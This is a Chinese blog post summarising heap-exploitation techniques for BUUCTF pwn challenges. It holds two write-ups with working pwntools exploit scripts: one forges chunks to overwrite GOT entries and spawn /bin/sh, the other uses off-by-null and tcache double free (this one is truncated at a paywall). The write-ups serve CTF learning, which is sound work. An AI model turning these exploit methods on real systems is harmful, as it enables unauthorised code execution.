BUUCTF PWN-堆题总结 2021-09-27

最新推荐文章于 2024-02-06 18:08:40 发布
最新推荐文章于 2024-02-06 18:08:40 发布
阅读量2k 收藏 19
点赞数 3
分类专栏: BUUCTF Pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56897090/article/details/120510003
版权

文章目录

整体分析-2021-09-27

本周的PWN都是以熟练、拓展Pwn的基础知识系统为方向
大致分类

  1. Unlink
  2. HourseOfForce
  3. File
  4. UAF
  5. Tcache
  6. 其他角度

堆题的总结经验:

  1. 任何东西都是万事开头难,要愿意耐心的一步步去动态调试理解底层的原理,一切都不是难事
  2. 注重对不同类型题目进行分类归纳模型,很多题目都具有一定共性
    1. 归纳寻找漏洞的特征模型
    2. 归纳解决该类题型的方法模板、流程
  3. 有意识的去选择练习不同类型的题目、拓展广度视野

新角度

稍微有一点偏(带了Crypto),不是重点,算开拓题目视野、角度

Tcache

在不同的系统版本(libc),漏洞利用的方式往往会不同,注重自己上机调试去一步步理解原理

UAF

非常经典的题目类型,多种角度达到任意地址写
多练练,多动手调试调试!

File结构体

新学习的漏洞利用方式,多积累,慢慢来

HourseOfForce

以一定条件为前提的利用类型:

  1. 我们只要分配小一点的堆块我们就可以溢出改写topchunk的size。
  2. 程序本身就可以分配任意大小的堆块,并没有任何限制。

Unlink

经典的堆入门题目的解决方案
=>以制造fakechunk达到任意读写堆数组地址
多动手调试,慢慢就能理解,都是模板化的东西

经验

在静态分析中

  1. 可以多动手调试的同时,在代码上写笔记或是对变量重命名
  2. 善用Patch功能,可以先以本地getshell为方向,升维攻击
  3. 注重环境(与elf的libc环境匹配),可使用glibc-allinone
  4. 注重内存之间的关系、溢出
    1. 填充满后(溢出)与填充前的不同?

堆溢出=>关键检查输入函数的逻辑

  1. 变量类型(无符号溢出?)
  2. 函数特征(strcpy、读入溢出\x00
  3. 读入函数逻辑存在溢出漏洞(+1)

堆题EXP编写的问题

  1. 如果遇到思路正确,但实在无法getshell(崩溃)或是其他原因,请检查一下内存的问题
    1. 对堆创建、修改时是否多了一个\n
  2. 先把堆题功能菜单写好,把简单做好,一步步来,做起来你就能知道下一步怎么走了。

新角度

ciscn_2019_final_5

分析

堆题

  1. 创建
  2. 修改
  3. 删除

与其他题目不同的地方:

  1. 会对内容进行 &(AND) |(OR)
  2. 会泄露一个low 12 bits(buf地址的后3个字节)
  3. 题目是ubuntu18

跳过,需要先安装ubuntn18的libc2.26动态调试漏洞版本

主题思路是利用算法特性,对堆进行攻击
漏洞分析

如上所说,本题地址存放比较特别,但是如果index为16,并且原地址第五位为0,就会导致地址被修改
而我们第一次申请时候地址最低12bits一般为0x260,即0010 0110 0000,和16即0001 0000或,就变成了0010 0111 0000即为0x270,我们就可以在chunk0的content中伪造一个chunk头部,把它释放之后再申请我们就能利用它控制下一个chunk了

漏洞利用

添加一个note[0],编号为16,size为0x10,内容为p64(0)+p64(0x91),再添加一个note[1],编号为1,size为0xc0(这个大小正好可以包括住content和size数组)
释放note[0]和note[1],重新申请一个0x80大小的note[2],把note[1]头部size改为0x21,fd改为content数组0x6020e0
申请一个0xc0大小的note[3],再申请同样大小的note[4],填入free_got, puts_got+1和atoi_got-4,大小全部设为0x10
先把free_got改为puts@plt(edit 8——free@got&0xf=8,atoi@got&0xf=8,所以需要减4),然后delete(1)泄露puts地址
edit 4把system地址写入,然后发送/bin/sh\x00即可

参考PWNKI的WP:https://www.cnblogs.com/luoleqi/p/13467067.html

保护情况:无PIE,可写GOT

[*] '/root/ciscn_final_5'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

EXP

from pwn import *

#r = remote("node4.buuoj.cn", 26967)
r = process("/root/ciscn_final_5",env={
   "LD_PRELOAD":"/root/libc.so.6"})#/lib64/27_1-linux.so.2"})

#/usr/local/glibc-2.26/lib/ld-2.26.so
context.log_level = 'debug'

elf = ELF("/root/ciscn_final_5")
libc = ELF('/root/libc.so.6')#ELF("/lib64/27_1-linux.so.2")#
content = 0x6020e0
free_got = elf.got['free']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
atoi_got = elf.got['atoi']

def add(index, size, content):
    r.sendlineafter("your choice: ",'1')
    r.sendlineafter("index: ",str(index))
    r.sendlineafter("size: ",str(size))
    r.recvuntil("content: ")
    r.send(content)


def delete(index):
    r.sendlineafter("your choice: ",'2')
    r.sendlineafter("index: ",str(index))

def edit(index, content):
    r.sendlineafter("your choice: ",'3')
    r.sendlineafter("index: ",str(index))
    r.recvuntil("content: ")
    r.send(content)

add(16,0x10,p64(0)+p64(0x90))
add(1, 0xc0, 'aa\n')
delete(0)
delete(1)
add(2, 0x80, p64(0)+p64(0x21)+p64(content))
add(3, 0xc0, 'aaa\n')
add(4, 0xc0, p64(free_got)+p64(puts_got+1)+p64(atoi_got-4)+p64(0)*17+p32(0x10)*8)
edit(8,p64(puts_plt)*2)
delete(1)
puts = u64(r.recv(6).ljust(8, '\x00'))
success("puts:"+hex(puts))
libc_base = puts - libc.symbols['puts']
system = libc_base + libc.sym['system']
edit(4, p64(system)*2)
r.recvuntil("your choice: ")
r.sendline('/bin/sh\x00')
r.interactive()

TCACHE

hitcon_2018_children_tcache

分析

整体特征:

  1. 创建
  2. 删除
    1. 正常清零,但会把堆内容重置为\xDA
  3. 输出

保护情况:全开
结合题目是ubuntu18.tcache

猜想:

  1. 申请大堆泄露unsorted bin地址
  2. Double Free攻击修改hook

[*] ‘/root/HITCON_2018_children_tcache’
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
FORTIFY: Enabled

看了WP
此题有一个经典的[[OFFByNull]]漏洞

strcpy 字符串复制函数。复制时,遇到结束符 \x00 才会停止复制。复制结束后,会在最后写入一个结束符 \x00
Pasted image 20210923152332.png

整体利用思路:

  1. 布置 4 个堆,先释放 chunk0 做好向前 unlink 准备。
  2. 通过写 chunk1 实现:溢出修改 chunk2 inuse ,还原 chunk2 prev_size ,伪造 chunk2 prev_size
  3. tcache bin double free 劫持 __free_hook 为 onegadget

主要是新知识的引入[[Tcache]]

  1. 一个程序允许7个tcache上限,后进入fast bin(unsorted bin)
  2. 同时libc2.27需要创建>1024大小的堆块才能进入unsorted bin
  3. tcache中的chunk永远不会被合并
  4. tcache也有单链回环结构的漏洞创建(double free)
  5. 0x250大小的堆一般是tcache的堆管理块

参考大佬的WP:https://blog.csdn.net/weixin_43921239/article/details/109252945

EXP

#coding:utf-8
from pwn import *
context(log_level='debug',arch='amd64')

#p = process("/root/HITCON_2018_children_tcache")
#libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf = ELF("/root/HITCON_2018_children_tcache")
p = remote("node4.buuoj.cn",27543)
libc = ELF("./x64/libc-2.27_buuctf.so")

def add(size, content):
	p.recvuntil("Your choice: ")
	p.sendline('1')
	p.recvuntil("Size:")
	p.sendline(str(size))
	p.recvuntil("Data:")
	p.send(content)

def free(index):
	p.recvuntil("Your choice: ")
	p.sendline('3')
	p.recvuntil("Index:")
	p.sendline(str(index))

def show(index):
	p.recvuntil("Your choice: ")
	p.sendline('2')
	p.recvuntil("Index:")
	p.sendline(str(index))

def pdd():
    log.success("pid=>"+str(p.pid))
    pause()

add(0x410,'s')
add(0xe8,'k')
add(0x4f0,'y')
add(0x60,'e')

free(0)#enter unsorted bin

free(1)#enter tcache bins



for i in range(0,6):
	add(0xe8-i,'k'*(0xe8-i))
	free(0)



add(0xe8,'k'*0xe0+p64(0x510))#off by null write size(01 05=> 00 05(0x500))
#overflows write size in chunk2(inuse) for unlink checks


free(2)

add(0x410,'leak libc')
show(0)

leak_addr = u64(p.recv(6).ljust(8,'\x00'))
log.info("leak_addr:"+hex(leak_addr))
libc_base = leak_addr -0x3ebca0
free_hook = libc_base + libc.sym['__free_hook']

add(0x60
最低0.47元/天 解锁文章
Ch1lkat
关注
  • 3
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。 浙江金融系
BUUCTFpwn题解(一些栈题+程序分析)
热门推荐
swedsn
01-13 1万+
文章目录前言一、test_your_nc二、rip2.读入数据总结 前言 萌新的总结(包含当时做题的全过程),方便以后查看。有什么不对的望各位大佬指点。 一、test_your_nc 1.直接nc(nc+的ip+端口号)。这里是直接进入了对方的shell命令中(有些题目是直接进入对方的文件并不会进入对方的shell中)。接下来就是和操作自己的shell一样的,ls查看目录,cat查看文件flag。 相互连接 二、rip 1使用IDA打开文件,先找main函数,然后按F5查看伪代码。看wp说fun可疑,点进
BUUCTF-PWN
weixin_52125240的博客
12-04 1737
BUUCTF-PWN1.test_your_nc2.rip3.warmup_csaw_20164.ciscn_2019_n_15.pwn1_sctf_2016 1.test_your_nc 根据名字的提示,来测试一下我们的nc cat flag 得到我们的flag nc的使用 nc的全名是netcat,其主要用途是建立和监听任意TCP和UDP连接,支持ipv4和ipv6。因此,它可以用来网络调试、端口扫描等等 常用语法: nc [-hlnruz][-g<网关...>][-G<指向器数目&
BUUCTF pwn
L0g1c的博客
01-30 1601
第一道: 第一步:连接nc靶场 第二步:连接靶场后,执行 ls 命令,展示该靶场下目录文件。 第三步:里有个 flag文件 使用 cat命令进行查看。 得到flag
BUUCTF PWN方向 1-6题 详解wp
最新发布
qq_62564422的博客
02-06 1409
构造payload:变量声明后顺序入栈,每个标识表示变量所占栈空间底部,s为输入的变量,则其需要覆盖的长度为0X3C~0X00(0X3C字节),0X00处表示返回地址值(4字节)需要覆盖;返回地址的数据(8字节)(被垃圾数 据覆盖后则改为访问之后地址)+(返回地址 地址数+1)(远程端使用了ubuntu18,ubuntu18以上版本调用64位程序中的system函数需要栈对齐,在执行system时有一个指令需要栈对齐 ,所以地址+1)而且这个空间是连续的,v1之后就是v2,他们的内存块是接在一起的。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
gris-treinamentos-pwn-2021
03-31
gris-treinamentos-pwn-2021 幻灯片浏览器
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021年鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及二进制安全和pwn技术的竞赛题目。本题主要考察了"off-by-null"漏洞的利用,这是一个在C语言编程中常见的安全问题。我们将围绕这个主题...
buuctfpwn
个人笔记
04-04 2668
一日一PWN/REpwn1_sctf_2016 实践是检验真理的唯一标准。 pwn1_sctf_2016 1.找到漏洞的利用点往往才是困难点。(直接F5看看反汇编) 发现两个可以函数跟进去看看 2.这里对反汇编出来的Vuln理解了半天(本还想从汇编直接分析,不过进展收获不大,欢迎有兴趣的朋友一起交流),下面还是从伪代码分析。 通过这几行能看出最后A变成了B。即把YOU 换成了I。 因为上面是S的溢出点是3C,可fgets之读取了32并不会超过3C,但函数会把一个32个I换成32个YOU就达到了溢出点。 3.
持续更新 BUUCTF——PWN(一)
weixin_41748164的博客
08-13 1048
buuctf pwn
buuctf习题pwn(2~10)
yw__y的博客
03-30 959
持续更新 BUUCTF——PWN(三)
weixin_41748164的博客
03-04 865
这只是个人笔记,buuctf的刷题的第三篇,欢迎一起讨论重新搭建一个合适pwn环境:https://blog.csdn.net/weixin_41748164/article/details/127874334buuctf的前两页:https://blog.csdn.net/weixin_41748164/article/details/126325515。
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 4945
BUU CTF PWN 入门知识详解
PWN】Fastbin 与 Tcache 的利用
u014377094的博客
05-03 1105
从本周开始,针对ctfwiki的顺序,整理堆的攻击方式,顺便练一下手。克服惰性与抗拒,才能继续进步。 首先是为何把fastbin和tcache放第一个整理,因为fastbin和tcache是所有后续攻击的基础,为了实现写入“任意”地址,通常情况下都是利用fastbin和tcache,有个明显的原因就是fastbin和tcache都采用单链表结构,结构更加简单,简单也意味着缺少复杂的检测,更加利于我们去利用。其次,为何把它俩放一起,原因还是两者的结构相似,地位相近,但细节上有不同,放在一起对比利用。 再说
Buuctfpwn
qq_53809201的博客
05-07 663
1.pwn1 from pwn import * log_level = 'debug' elf = ELF("./pwn1") local = 0 if local: r = process("./pwn1") else: r = remote("node4.buuoj.cn",29317) bin_sh = 0x000000000040118A system_addr = 0x0000000000401191 payload = b'a'*0x0F + p64(system_addr) +
buuctf pwn解题
2301_80477504的博客
02-01 457
1.
buuctf--pwn小结1test_your_nc
Xor0ne
06-14 2205
参考链接: 1、BUUCTF刷题(持续更新) 2、BUUCTF-PWN刷题日记 0x01 test_your_nc 参考链接:https://blog.csdn.net/qq_42404383/article/details/103625124 (1)、思路:看名字,然后直接用nc nc的全名是netcat,其主要用途是建立和监听任意TCP和UDP连接,支持ipv4和ipv6。因此,它可以用来网络调试、端口扫描等等。 nc [-hlnruz][-g<网关...>][-G<指向器数目&
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值